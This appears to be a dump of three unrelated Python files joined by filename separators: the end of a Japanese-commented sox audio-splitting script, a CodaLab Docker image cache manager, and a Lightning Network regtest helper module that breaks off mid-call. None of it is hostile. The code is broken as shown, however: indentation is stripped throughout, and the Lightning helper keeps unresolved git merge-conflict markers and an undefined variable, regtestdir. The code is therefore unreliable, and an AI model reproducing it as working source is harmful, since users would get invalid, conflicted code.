sox = subprocess.Popen(['sox', '-q', work_file, '-r', '16000', '-b', '16', '-c', '1', ftrim, 'trim', str((nn-1)*sep_sec), str(sep_sec+1), ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
sox.wait()
sox.terminate()
sox = None
ftrim_size = 0
try:
rb = open(ftrim, 'rb')
ftrim_size = sys.getsizeof(rb.read())
rb.close
rb = None
except Exception as e:
rb = None
if (ftrim_size < int(self.minSize)):
os.remove(ftrim)
nn = 0
else:
if (self.micDev.isdigit()):
sec = int((ftrim_size-44)/2/16000)
else:
sec = int(base_byte/2/16000) + (nn-1)*sep_sec
hh = int(sec/3600)
mm = int((sec-hh*3600)/60)
ss = int(sec-hh*3600-mm*60)
tm = '{:02}{:02}{:02}'.format(hh,mm,ss)
fwork = path + stamp + '.' + proc_name + '(' + '{:03}'.format(nn) + ').' + tm + '.wav'
fjuli = qPath_s_jul + stamp + '.' + proc_name + '(' + '{:03}'.format(nn) + ').' + tm + '.wav'
frec = qPath_rec + stamp + '.' + proc_name + '(' + '{:03}'.format(nn) + ').' + tm + '.mp3'
try:
qFunc.copy(ftrim, fwork)
qFunc.copy(ftrim, fjuli)
if (self.micDev.isdigit()):
sox = subprocess.Popen(['sox', '-q', ftrim, '-r', '16000', '-b', '16', '-c', '1', frec, ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
sox.wait()
sox.terminate()
sox = None
# 結果出力
if (cn_s.qsize() < 99):
out_name = 'filename'
out_value = fjuli
cn_s.put([out_name, out_value])
except Exception as e:
pass
nn += 1
if __name__ == '__main__':
# 共通クラス
qFunc.init()
# ログ
nowTime = datetime.datetime.now()
filename = qPath_log + nowTime.strftime('%Y%m%d.%H%M%S') + '.' + os.path.basename(__file__) + '.log'
qLog.init(mode='logger', filename=filename, )
# 初期設定
qFunc.remove(qCtrl_control_speech)
qFunc.statusReset_speech(False)
# パラメータ
runMode = 'debug'
if (len(sys.argv) >= 2):
runMode = str(sys.argv[1]).lower()
# 開始
voice2wav_thread = proc_voice2wav('voice2wav', '0', runMode, )
voice2wav_thread.begin()
# テスト実行
if (len(sys.argv) < 2):
chktime = time.time()
while ((time.time() - chktime) < 15):
res_data = voice2wav_thread.get()
res_name = res_data[0]
res_value = res_data[1]
if (res_name != ''):
print(res_name, res_value, )
if (voice2wav_thread.proc_s.qsize() == 0):
voice2wav_thread.put(['_status_', ''])
time.sleep(0.05)
# 単体実行
if (len(sys.argv) >= 2):
# 待機ループ
while (True):
# 終了確認
control = ''
txts, txt = qFunc.txtsRead(qCtrl_control_speech)
if (txts != False):
qLog.log('info', str(txt))
if (txt == '_end_'):
break
else:
qFunc.remove(qCtrl_control_speech)
control = txt
# メッセージ
res_data = voice2wav_thread.get()
res_name = res_data[0]
res_value = res_data[1]
#if (res_name != ''):
# print(res_name, res_value, )
time.sleep(0.50)
# 終了
voice2wav_thread.abort()
del voice2wav_thread
|
docker_image_manager.py
|
from collections import namedtuple
import threading
import time
import traceback
import logging
import docker
import codalab.worker.docker_utils as docker_utils
from codalab.worker.fsm import DependencyStage
from codalab.worker.state_committer import JsonStateCommitter
from codalab.worker.worker_thread import ThreadDict
from codalab.lib.formatting import size_str
logger = logging.getLogger(__name__)
# Stores the download state of a Docker image (also includes the digest being pulled, digest string,
# DependencyStage and relevant status message from the download)
ImageAvailabilityState = namedtuple('ImageAvailabilityState', ['digest', 'stage', 'message'])
# Stores information relevant about caching about docker images
ImageCacheEntry = namedtuple(
'ImageCacheEntry', ['id', 'digest', 'last_used', 'virtual_size', 'marginal_size']
)
class DockerImageManager:
CACHE_TAG = 'codalab-image-cache/last-used'
def __init__(self, commit_file, max_image_cache_size, max_image_size):
"""
Initializes a DockerImageManager
:param commit_file: String path to where the state file should be committed
:param max_image_cache_size: Total size in bytes that the image cache can use
:param max_image_size: Total size in bytes that the image can have
"""
self._state_committer = JsonStateCommitter(commit_file) # type: JsonStateCommitter
self._docker = docker.from_env() # type: DockerClient
self._downloading = ThreadDict(
fields={'success': False, 'status': 'Download starting.'}, lock=True
)
self._max_image_cache_size = max_image_cache_size
self._max_image_size = max_image_size
self._stop = False
self._sleep_secs = 10
self._cleanup_thread = None
def start(self):
logger.info("Starting docker image manager")
if self._max_image_cache_size:
def cleanup_loop(self):
while not self._stop:
try:
self._cleanup()
except Exception:
traceback.print_exc()
time.sleep(self._sleep_secs)
self._cleanup_thread = threading.Thread(target=cleanup_loop, args=[self])
self._cleanup_thread.start()
def stop(self):
logger.info("Stopping docker image manager")
self._stop = True
logger.debug("Stopping docker image manager: stop the downloads threads")
self._downloading.stop()
if self._cleanup_thread:
logger.debug("Stopping docker image manager: stop the cleanup thread")
self._cleanup_thread.join()
logger.info("Stopped docker image manager")
def _get_cache_use(self):
return sum(
float(image.attrs['VirtualSize']) for image in self._docker.images.list(self.CACHE_TAG)
)
def _cleanup(self):
"""
Prunes the image cache for runs.
1. Only care about images we (this DockerImageManager) downloaded and know about.
2. We also try to prune any dangling docker images on the system.
3. We use sum of VirtualSize's, which is an upper bound on the disk use of our images:
in case no images share any intermediate layers, this will be the real disk use,
however if images share layers, the virtual size will count that layer's size for each
image that uses it, even though it's stored only once in the disk. The 'Size' field
accounts for the marginal size each image adds on top of the shared layers, but summing
those is not accurate either since the shared base layers need to be counted once to get
the total size. (i.e. summing marginal sizes would give us a lower bound on the total disk
use of images). Calling df gives us an accurate disk use of ALL the images on the machine
but because of (1) we don't want to use that.
"""
# Sort the image cache in LRU order
def last_used(image):
for tag in image.tags:
if tag.split(":")[0] == self.CACHE_TAG:
return float(tag.split(":")[1])
cache_use = self._get_cache_use()
if cache_use > self._max_image_cache_size:
logger.info(
'Disk use (%s) > max cache size (%s): starting image pruning',
cache_use,
self._max_image_cache_size,
)
all_images = self._docker.images.list(self.CACHE_TAG)
all_images_sorted = sorted(all_images, key=last_used)
logger.info("Cached docker images: {}".format(all_images_sorted))
for image in all_images_sorted:
# We re-list all the images to get an updated total size since we may have deleted some
cache_use = self._get_cache_use()
if cache_use > self._max_image_cache_size:
image_tag = (
image.attrs['RepoTags'][-1]
if len(image.attrs['RepoTags']) > 0
else '<none>'
)
logger.info(
'Disk use (%s) > max cache size (%s), pruning image: %s',
cache_use,
self._max_image_cache_size,
image_tag,
)
try:
self._docker.images.remove(image.id, force=True)
except docker.errors.APIError as err:
# Two types of 409 Client Error can be thrown here:
# 1. 409 Client Error: Conflict ("conflict: unable to delete <image_id> (cannot be forced)")
# This happens when an image either has a running container or has multiple child dependents.
# 2. 409 Client Error: Conflict ("conflict: unable to delete <image_id> (must be forced)")
# This happens when an image is referenced in multiple repositories.
# We can only remove images in 2rd case using force=True, but not the 1st case. So after we
# try to remove the image using force=True, if it failed, then this indicates that we were
# trying to remove images in 1st case. Since we can't do much for images in 1st case, we
# just continue with our lives, hoping it will get deleted once it's no longer in use and
# the cache becomes full again
logger.error(
"Cannot forcibly remove image %s from cache: %s", image_tag, err
)
logger.debug("Stopping docker image manager cleanup")
def get(self, image_spec):
"""
Always request the newest docker image from Dockerhub if it's not in downloading thread and return the current
downloading status(READY, FAILED, or DOWNLOADING).
When the requested image in the following states:
1. If it's not available on the platform, we download the image and return DOWNLOADING status.
2. If another thread is actively downloading it, we return DOWNLOADING status.
3. If another thread was downloading it but not active by the time the request was sent, we return the following status:
* READY if the image was downloaded successfully.
* FAILED if the image wasn't able to be downloaded due to any reason.
:param image_spec: Repo image_spec of docker image being requested
:returns: A DockerAvailabilityState object with the state of the docker image
"""
def image_availability_state(image_spec, success_message, failure_message):
"""
Try to get the image specified by image_spec from host machine.
Return ImageAvailabilityState.
"""
try:
image = self._docker.images.get(image_spec)
digests = image.attrs.get('RepoDigests', [image_spec])
digest = digests[0] if len(digests) > 0 else None
new_timestamp = str(time.time())
image.tag(self.CACHE_TAG, tag=new_timestamp)
for tag in image.tags:
tag_label, timestamp = tag.split(":")
# remove any other timestamp but not the current one
if tag_label == self.CACHE_TAG and timestamp != new_timestamp:
self._docker.images.remove(tag)
return ImageAvailabilityState(
digest=digest, stage=DependencyStage.READY, message=success_message
)
except Exception as ex:
return ImageAvailabilityState(
digest=None, stage=DependencyStage.FAILED, message=failure_message % ex
)
if ':' not in image_spec:
# Both digests and repo:tag kind of specs include the : character. The only case without it is when
# a repo is specified without a tag (like 'latest')
# When this is the case, different images API methods act differently:
# - pull pulls all tags of the image
# - get tries to get `latest` by default
# That means if someone requests a docker image without a tag, and the image does not have a latest
# tag pushed to Dockerhub, pull will succeed since it will pull all other tags, but later get calls
# will fail since the `latest` tag won't be found on the system.
# We don't want to assume what tag the user wanted so we want the pull step to fail if no tag is specified
# and there's no latest tag on dockerhub.
# Hence, we append the latest tag to the image spec if there's no tag specified otherwise at the very beginning
image_spec += ':latest'
try:
if image_spec in self._downloading:
with self._downloading[image_spec]['lock']:
if self._downloading[image_spec].is_alive():
return ImageAvailabilityState(
digest=None,
stage=DependencyStage.DOWNLOADING,
message=self._downloading[image_spec]['status'],
)
else:
if self._downloading[image_spec]['success']:
status = image_availability_state(
image_spec,
success_message='Image ready',
failure_message='Image {} was downloaded successfully, '
'but it cannot be found locally due to unhandled error %s'.format(
image_spec
),
)
else:
status = image_availability_state(
image_spec,
success_message='Image {} can not be downloaded from DockerHub '
'but it is found locally'.format(image_spec),
failure_message=self._downloading[image_spec]['message'] + ": %s",
)
self._downloading.remove(image_spec)
return status
else:
def download():
logger.debug('Downloading Docker image %s', image_spec)
try:
self._docker.images.pull(image_spec)
logger.debug('Download for Docker image %s complete', image_spec)
self._downloading[image_spec]['success'] = True
self._downloading[image_spec]['message'] = "Downloading image"
except (docker.errors.APIError, docker.errors.ImageNotFound) as ex:
logger.debug('Download for Docker image %s failed: %s', image_spec, ex)
self._downloading[image_spec]['success'] = False
self._downloading[image_spec][
'message'
] = "Can't download image: {}".format(ex)
# Check docker image size before pulling from Docker Hub.
# Do not download images larger than self._max_image_size
# Download images if size cannot be obtained
try:
image_size_bytes = docker_utils.get_image_size_without_pulling(image_spec)
if image_size_bytes > self._max_image_size:
failure_msg = (
"The size of "
+ image_spec
+ ": {} exceeds the maximum image size allowed {}.".format(
size_str(image_size_bytes), size_str(self._max_image_size)
)
)
return ImageAvailabilityState(
digest=None, stage=DependencyStage.FAILED, message=failure_msg
)
except Exception as ex:
logger.warn("Cannot fetch image size beforehands: %s", ex)
self._downloading.add_if_new(image_spec, threading.Thread(target=download, args=[]))
return ImageAvailabilityState(
digest=None,
stage=DependencyStage.DOWNLOADING,
message=self._downloading[image_spec]['status'],
)
except Exception as ex:
return ImageAvailabilityState(
digest=None, stage=DependencyStage.FAILED, message=str(ex)
)
|
utils.py
|
import logging
import os
import random
import re
import shutil
import sqlite3
import string
import subprocess
import threading
import time
from btcproxy import BitcoinRpcProxy
from bitcoin.rpc import RawProxy as BitcoinProxy
from decimal import Decimal
from ephemeral_port_reserve import reserve
from lightning import LightningRpc
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
<<<<<<< HEAD
=======
"rpcport": 57776,
>>>>>>> upstream/master
}
LIGHTNINGD_CONFIG = {
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
}
with open('config.vars') as configfile:
config = dict([(line.rstrip().split('=', 1)) for line in configfile])
DEVELOPER = os.getenv("DEVELOPER", config['DEVELOPER']) == "1"
TIMEOUT = int(os.getenv("TIMEOUT", "60"))
VALGRIND = os.getenv("VALGRIND", config['VALGRIND']) == "1"
SLOW_MACHINE = os.getenv("SLOW_MACHINE", "0") == "1"
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success() and time.time() < start_time + timeout:
time.sleep(interval)
interval *= 2
if interval > 5:
interval = 5
if time.time() > start_time + timeout:
raise ValueError("Error waiting for {}", success)
def write_config(filename, opts, regtest_opts=None):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[regtest]\n")
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line, stdout=subprocess.PIPE, env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
if self.proc.returncode:
raise ValueError("Process '{}' did not cleanly shutdown: return code {}".format(self.proc.pid, rc))
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
if self.log_filter(line.decode('ASCII')):
continue
if self.verbose:
logging.debug("%s: %s", self.prefix, line.decode().rstrip())
with self.logs_cond:
self.logs.append(str(line.rstrip()))
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
return proxy._call(name, *args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
<<<<<<< HEAD
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
=======
def __init__(self, bitcoin_dir="/root/.chips", rpcport=57776):
TailableProc.__init__(self, bitcoin_dir)
>>>>>>> upstream/master
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'chipsd'
self.cmd_line = [
'chipsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
<<<<<<< HEAD
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
btc_conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(btc_conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
=======
btc_conf_file = os.path.join(regtestdir, 'chips.conf')
write_config(os.path.join(bitcoin_dir, 'chips.conf'), BITCOIND_CONFIG)
write_config(btc_conf_file, BITCOIND_CONFIG)
>>>>>>> upstream/master
self.rpc = SimpleBitcoinProxy(btc_conf_file=btc_conf_file)
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def generate_block(self, numblocks=1):
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoind, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd/lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = BitcoinRpcProxy(bitcoind)
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': 'false',
'network': 'regtest',
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(lightning_dir):
os.makedirs(lightning_dir)
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-broadcast-interval'] = 1000
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in sorted(self.opts.items()):
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self):
self.rpcproxy.start()
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self)
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
self.rpcproxy.stop()
return self.proc.returncode
class LightningNode(object):
def __init__(self, daemon, rpc, btc, executor, may_fail=False, may_reconnect=False):
self.rpc = rpc
self.daemon = daemon
self.bitcoin = btc
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
def openchannel(self, remote_node, capacity, addrtype="p2sh-segwit", confirm=True, announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and remote_node.info['id'] not in [p['id'] for p in self.rpc.listpeers()['peers']]:
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or announce:
self.bitcoin.generate_block(1)
if announce:
self.bitcoin.generate_block(5)
if confirm or announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)['address']
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {}'.format(txid))
return addr, txid
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query, use_copy=True):
orig = os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3")
if use_copy:
copy = os.path.join(self.daemon.lightning_dir, "lightningd-copy.sqlite3")
shutil.copyfile(orig, copy)
db = sqlite3.connect(copy)
else:
db = sqlite3.connect(orig)
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
rows = c.fetchall()
result = []
for row in rows:
result.append(dict(zip(row.keys(), row)))
db.commit()
c.close()
db.close()
return result
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def start(self):
self.daemon.start()
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if rc is None:
rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(rc))
else:
return rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['address']
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
numfunds = len(self.rpc.listfunds()['outputs'])
self.bitcoin.generate_block(1)
wait_for(lambda: len(self.rpc.listfunds()['outputs']) > numfunds)
# Now go ahead and open a channel
num_tx = len(self.bitcoin.rpc.getrawmempool())
tx = self.rpc.fundchannel(l2.info['id'], amount)['tx']
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
self.bitcoin.generate_block(1)
# Hacky way to find our output.
scid = None
decoded = self.bitcoin.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
scid = "{}:1:{}".format(self.bitcoin.rpc.getblockcount(), out['n'])
break
if not scid:
# Intermittent decoding failure. See if it decodes badly twice?
decoded2 = self.bitcoin.rpc.decoderawtransaction(tx)
raise ValueError("Can't find {} payment in {} (1={} 2={})".format(amount, tx, decoded, decoded2))
if wait_for_active:
# We wait until gossipd sees both local updates, as well as status NORMAL,
# so it can definitely route through.
self.daemon.wait_for_logs([r'update for channel {}\(0\) now ACTIVE'
.format(scid),
r'update for channel {}\(1\) now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
l2.daemon.wait_for_logs([r'update for channel {}\(0\) now ACTIVE'
.format(scid),
r'update for channel {}\(1\) now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
return scid
def subd_pid(self, subd):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
ex = re.compile(r'lightning_{}.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels()['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_routes(self, channel_ids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}\\(0\\)'.format(c)
for c in channel_ids]
+ ['Received channel_update for channel {}\\(1\\)'.format(c)
for c in channel_ids])
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
rhash = dst.rpc.invoice(amt, label, label)['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst.info['id'],
'delay': 5,
'channel': '1:1:1'
}
def wait_pay():
# Up to 10 seconds for payment to succeed.
start_time = time.time()
while dst.rpc.listinvoices(label)['invoices'][0]['status'] != 'paid':
if time.time() > start_time + 10:
raise TimeoutError('Payment timed out')
time.sleep(0.1)
# sendpay is async now
self.rpc.sendpay([routestep], rhash)
# wait for sendpay to comply
self.rpc.waitsendpay(rhash)
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [4, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[2] * 4
else:
raise ValueError()
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda: self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 3)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, testname, bitcoind, executor, directory):
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'may_reconnect',
'random_hsm',
'log_all_io',
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(self.get_node, options=cli_opts, **node_opts))
return [j.result() for j in jobs]
def get_node(self, disconnect=None, options=None, may_fail=False,
may_reconnect=False, random_hsm=False,
feerates=(15000, 7500, 3750), start=True, log_all_io=False):
with self.lock:
node_id = self.next_id
self.next_id += 1
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
socket_path = os.path.join(lightning_dir, "lightning-rpc").format(node_id)
daemon = LightningD(
lightning_dir, self.bitcoind,
